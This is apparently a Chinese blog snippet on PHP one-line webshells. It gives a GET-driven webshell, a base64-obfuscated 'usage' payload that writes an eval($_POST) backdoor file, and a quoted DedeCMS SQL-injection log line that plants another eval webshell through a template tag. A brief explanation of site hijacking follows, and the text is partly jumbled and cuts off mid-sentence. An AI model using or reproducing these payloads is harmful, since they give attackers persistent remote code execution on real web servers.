<php $_GET[a]($_GET[b]);>
仅用GET函数就构成了木马;
利用方法:
a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
执行后当前目录生成cphp一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用121199250||/plus/downloadphpopen= || INSERT INTO `dede_myad` SET `normbody` = '{dede:php}file_put_contents(''k'',''<php eval($_POST[k]);>'');{/dede:php}'');{/dede:php}' WHERE `aid` =1#downloads`(`hash`,`id`,`downloads`) VALUES('d41d8cd98f00b204e9800998ecf8427e','0',1); ||comment detect
看这一段大概可以看懂吧,应该是像数据库里面插入了什么东西!
insert into set where values这是一种典型的挂马,黑客将你的服务器攻陷后(有时甚至不用攻陷),通过修改你网站代码,来达到抓肉鸡,赚取点击量或者其他什么目的。
首先,第一次出现的代码是比较原始的窗口d出(就是将">
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)